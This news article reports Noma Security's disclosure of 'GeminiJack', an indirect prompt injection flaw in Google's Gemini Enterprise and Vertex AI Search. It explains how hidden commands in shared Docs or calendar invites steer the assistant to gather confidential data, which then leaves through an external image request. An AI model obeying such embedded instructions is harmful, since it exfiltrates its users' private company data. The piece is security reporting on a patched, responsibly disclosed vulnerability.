Recently, cybersecurity firm Noma Security unveiled a critical security vulnerability, termed “GeminiJack,” located within Google’s Gemini Enterprise platform and the Vertex AI Search tool. This flaw could potentially facilitate unauthorized access to sensitive corporate data without any interaction from the targeted employee, leaving minimal traces for detection.
The investigation by Noma Labs, part of Noma Security, revealed that this issue stemmed from an “architectural weakness” inherent in the design of these enterprise AI systems, which are tasked with processing information across an organization’s Google services, such as Gmail, Calendar, and Docs. This design flaw was discovered on June 5, 2025, with the initial report submitted to Google on the same day, emphasizing the urgency of the security risk involved.
The Hidden Attack Method
According to a recent blog post from Noma Security, GeminiJack represents a sophisticated form of “indirect prompt injection.” This technique allows an attacker to embed covert commands within shared documents, such as a Google Doc or calendar invitations. When an employee queries the Gemini Enterprise system, the AI inadvertently executes these embedded commands as legitimate instructions, potentially accessing vast arrays of company data.
The researchers have identified that even a single successful command could yield extensive confidential data, including complete calendar histories revealing critical business relationships, entire repositories of sensitive documents, and several years’ worth of email communications that encompass both customer information and financial discussions.
Significantly, this vulnerability does not require the attacker to possess detailed knowledge about the targeted organization. Simple keywords such as “acquisition” or “salary” can prompt the AI to gather pertinent information, effectively conducting a surveillance operation on its owner. Moreover, the exfiltrated data was delivered back to the attacker through a concealed external image request, making it appear as typical web traffic during the AI’s data retrieval process.
Google’s Quick Response and Key Changes
In response to these findings, Noma Labs collaborated with Google to authenticate the identified vulnerabilities. Google promptly rolled out modifications to the architecture of Gemini Enterprise and Vertex AI Search, altering the interaction mechanisms of these systems with data sources. Notably, Vertex AI Search has since been isolated from Gemini Enterprise, ceasing to utilize the same Retrieval-Augmented Generation (RAG) capabilities.
Experts’ Comments
The gravity of the GeminiJack vulnerability was emphasized by Sasi Levi, Security Research Lead at Noma Security, who commented that this case exemplifies an indirect prompt injection attack, necessitating meticulous scrutiny of all data streams accessed by the AI. Levi noted the lack of filtering for HTML output, which allowed the exploitation of an embedded image tag to trigger calls to the attacker’s server, leading to the unintentional sharing of sensitive internal data.
Elad Luz, Head of Research at Oasis Security, posited that the widespread nature of this vulnerability, combined with its low detection probability, underscores its significance. He stressed that while Google has patched the immediate issues, organizations must reassess their interconnected data sources. Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, described the exploitation as an intriguing attack vector, suggesting its persistence in future cybersecurity incidents, given that AI systems often interpret inputs within user contexts.
